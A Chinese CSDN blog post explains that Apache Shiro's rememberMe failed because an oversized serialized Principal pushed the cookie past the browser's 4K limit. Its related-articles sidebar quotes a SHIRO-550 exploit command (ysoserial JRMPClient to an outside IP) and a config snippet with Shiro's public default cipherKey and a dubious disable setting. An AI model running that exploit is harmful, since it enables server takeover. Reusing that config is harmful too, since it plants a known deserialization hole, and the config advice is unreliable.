apache shiro remember me 不起作用

最新推荐文章于 2023-12-14 17:05:44 发布
最新推荐文章于 2023-12-14 17:05:44 发布
阅读量1.2k 收藏 1
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u012418561/article/details/53410087
版权

现象:

项目使用了shiro进行认证,配置了rememberMe后,死活不起作用


原因:

浏览器对cookie的大小有限制,总大小不能超过4K,服务器返回给浏览器的cookie有5k多,所以浏览器直接忽略了cookie而没有保存rememberMe这个cookie。


解决:

这串cookie其实是对 Principal 进行了序列化后再Base64的结果,要缩短cookie的长度,就需要减少Principal 的数据量,我因为把整个用户的数据(包括菜单资源)全部赋给了Principal ,导致Principal 过大,最后使用简单的对象只保存了用户的用户名和ID,减小Principal ,从而缩短了cookie的长度,解决了这个问题。

u012418561
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
SHIRO-550:Shiro RememberMe 1.2.4反序列化突破
03-10
Shiro RememberMe 1.2.4反序列化突破(SHIRO-550)commons-collections-3.2.1.jar java -jar ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient "10.10.20.166:12345" |python exp.py java -cp ysoserial-0.0.6-SNAPSHOT...
shiro会话管理
qq_63531917的博客
08-29 317
首先导入pom.xml-- slf4j核心包 -- > < dependency > < groupId > org . slf4j < / groupId > < artifactId > slf4j - api < / artifactId > < version > $ {
Shiro进阶(四)Shiro之RememberMe
web13985085406的博客
04-22 1395
前言 本章讲解一下Shiro的记住我的功能 方法 1.概念 首先要澄清一点的是,这里的记住我并不是记住用户名和密码。 shiro的记住我是一种基于cookie实现的方式,特定的页面在关掉浏览器后(session消失)也可以进行访问的功能! 2.实现步骤 1)前台登录页面修改 如果需要记住我的功能,那么前台页面需要一个checkbox多选框来让用户进行勾选。 这里我就不进行说明了。丑一点没关系哈。 2)controller登录方法修改 3)修改shiro配置文件 <!-- 配置Shiro的Secur
Shiro实现rememberMe功能
Massimo__JAVA的博客
10-06 1792
Shiro实现rememberMe功能
Shiro550 Java反序列化漏洞分析
m0_54850825的博客
03-29 498
漏洞分析 Shiro提供了记住我(RememberMe)的功能,关闭了浏览器下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问。 Shiro对rememberMe的cookie做了加密处理,shiro在CookieRememberMeManaer类中将cookie中rememberMe字段内容分别进行 序列化、AES加密、Base64编码操作。 在识别身份的时候,需要对Cookie里的rememberMe字段解密。根据加密的顺序,不难知道解密的顺序为: 获取rememberMe cookie ba
快速掌握shiro安全框架(四)之remember me功能
bigdata_dog的博客
03-04 855
ShiroConfig配置类中添加记住我和cookie相关配置项以及用户过滤器
Shiro-EXP:Apache Shiro 反序列化漏洞检测与利用工具,一键注入内存马
05-26
与项目相关文章首发于:Shiro exp使用手册Shiro rememberMe反序列化漏洞漏洞原理Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie,服务端对rememberMe的cookie值...
Apache shiro1.2.4反序列化漏洞介绍.docx
07-01
Apache shiro1.2.4反序列化漏洞介绍 Apache Shiro是一个Java安全框架,执行身份验证...Apache Shiro框架提供了记住我(RememberMe)的功能,关闭了浏览器下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问。
Apache-Shiro-中文参考文档.docx
07-20
Apache Shiro 是一个强大而灵活的开源安全框架,它干净利落地处理身份认证,授权,企业会话管理和加密。...• 为没有关联到登录的用户启用"Remember Me"服务 … 以及更多——全部集成到紧密结合的易于使用的 API 中。
Apache Shiro Padding Oracle漏洞可导致远程命令执行漏洞解决
01-09
背景:Apach Shiro官方披露其cookie持久化参数rememberMe加密算法存在漏洞,可被Padding Oracle攻击,攻击者利用Padding Oracle攻击手段可构造恶意的rememberMe值,绕过加密算法验证,执行java反序列化操作,最终可...
springboot整合shiro-配置记住我(四)
这个名字想了很久
09-02 1万+
原文地址,转载请注明出处:&amp;amp;amp;amp;nbsp;https://blog.csdn.net/qq_34021712/article/details/80306432&amp;amp;amp;amp;nbsp;&amp;amp;amp;amp;nbsp; &amp;amp;amp;amp;nbsp;&amp;amp;amp;amp;nbsp;©王赛超&amp;amp;amp;amp;nbsp; shiro系列 springboot整合s
MyBatis常用的XML配置
weixin_43381785的博客
09-13 395
Mybatis常用的XML配置 1.Maven依赖 2.核心配置文件 3.Mapper配置 4.解决Maven静态资源过滤问题 5.EhCache缓存配置
shiro使用(简单记住我/下次自动登录流程)附:cookie内容为deleteme的最终解决方法
热门推荐
特别享受思考问题的过程
03-26 1万+
既然要做,就做的细致一点,对得起自己! 写在前面:学过JSP的都知道,这种实现的方式就是cookie,就够了。 配置shiro.xml,配置cookie. 1.配置cookie的名字,存活时间以及其他 <bean id="cookieRememberMe" class="org.apache.shiro.web.servlet.simpleCookie"> <con...
apache shiro 反序列化漏洞解决方案
qq_36407469的博客
07-27 4939
一、反序列化漏洞介绍 序列化:把对象转换为字符串或者字节流的过程。 反序列化:把字符串或者字节流恢复为对象的过程。 反序列化漏洞的产生原理,即黑客通过构造恶意的序列化数据,从而控制应用在反序列化过程中需要调用的类方法,最终实现任意方法调用。如果在这些方法中有命令执行的方法,黑客就可以在服务器上执行任意的命令。 二、产生原因 shiro提供了记住我(RememberMe)的功能,即可以在关闭浏览器的情况下,下次打开时还能记住你是谁,无需登录即可访问。 shiro默认使用了CookieRememberMeMa
若依低版本漏洞:shiro反序列化解决方式
最新发布
weixin_43267639的博客
12-14 1412
在若依低版本中shiro可能会有反序列化的问题,因为是固定密钥的方式导致的。 解决方式如下: 1、升级shiro至最新版本 2、保持shiro版本不变
Shiro入门-rememberMe
大白能的博客
04-06 1506
记住我 用户登陆选择“自动登陆”本次登陆成功会向cookie写身份信息,下次登陆从cookie中取出身份信息实现自动登陆。用户身份实现java.io.Serializable接口 向cookie记录身份信息需要用户身份信息对象实现序列化接口配置rememeberMeManager spring-shiro.xml<!-- securityManager安全管理器 --> <bean id="se
Spring+Shiro权限管理 (四) 为Shiro添加RememberMe(记住我)功能
Escorts的博客
09-26 1024
废话少说,进入正题。 思路: 1、ApplicationContext.xml中,配置 CookieRememberMeManager (记住我的Cookie管理器); 2、CookieRememberMeManager需要Cookie,我们配置一个Shiro的Cookie实现类 SimpleCookie ; 3、把CookieRememberMeManager配置进Shiro的Se...
shiro关闭rememberme功能
06-07
要关闭Shiro的RememberMe功能,你可以在Shiro的配置文件中设置一个rememberMe属性,将它的值设为false。具体来说,你需要在配置文件中添加如下内容: ``` [main] securityManager.rememberMeManager = org.apache.shiro.mgt.RememberMeManager securityManager.rememberMeManager.cookie = org.apache.shiro.web.servlet.SimpleCookie securityManager.rememberMeManager.cookie.name = rememberMe securityManager.rememberMeManager.cookie.maxAge = 2592000 securityManager.rememberMeManager.cipherKey = kPH+bIxk5D2deZiIxcaaaA== [users] # ... [roles] # ... [urls] # ... [main] rememberMe = false ``` 在这个配置中,rememberMe属性被设为false,表示关闭RememberMe功能。如果你想开启它,只需要将它的值改为true即可。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值